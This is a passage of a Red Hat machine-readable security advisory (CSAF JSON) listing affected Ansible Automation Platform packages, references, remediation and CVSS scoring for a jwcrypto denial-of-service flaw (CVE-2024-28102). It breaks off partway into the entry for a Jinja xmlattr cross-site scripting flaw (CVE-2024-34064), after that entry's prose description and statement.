"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-28102"
},
{
"category": "external",
"summary": "RHBZ#2268758",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2268758"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-28102",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28102"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-28102",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28102"
},
{
"category": "external",
"summary": "https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f",
"url": "https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f"
},
{
"category": "external",
"summary": "https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97",
"url": "https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97"
}
],
"release_date": "2024-03-08T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-07-12T01:43:40+00:00",
"details": "Red Hat Ansible Automation Platform",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:4522"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options don\u0027t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "python-jwcrypto: malicious JWE token can cause denial of service"
},
{
"cve": "CVE-2024-34064",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-05-07T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2279476"
}
],
"notes": [
{
"category": "description",
"text": "Jinja is an extensible templating engine. The `xmlattr` filter in affected versions of Jinja accepts keys containing non-attribute characters. XML/HTML attributes cannot contain spaces, `/`, `\u003e`, or `=`, as each would then be interpreted as starting a separate attribute. If an application accepts keys (as opposed to only values) as user input, and renders these in pages that other users see as well, an attacker could use this to inject other attributes and perform XSS. The fix for CVE-2024-22195 only addressed spaces but not other characters. Accepting keys as user input is now explicitly considered an unintended use case of the `xmlattr` filter, and code that does so without otherwise validating the input should be flagged as insecure, regardless of Jinja version. Accepting _values_ as user input continues to be safe. This vulnerability is fixed in 3.1.4.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "jinja2: accepts keys containing non-attribute characters",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The fix for CVE-2024-22195 only addressed spaces, not other characters. Accepting keys as user input is now explicitly considered an unintended use case of the `xmlattr` filter, and code that does so without otherwise validating the input should be flagged as insecure, regardless of Jinja version. Accepting _values_ as user input continues to be safe.\n\nFence agents on RHEL 8 has been fixed as a part of https://access.redhat.com/errata/RHBA-2024:4238",
"title": "Statement"
},
{
"category": "general",
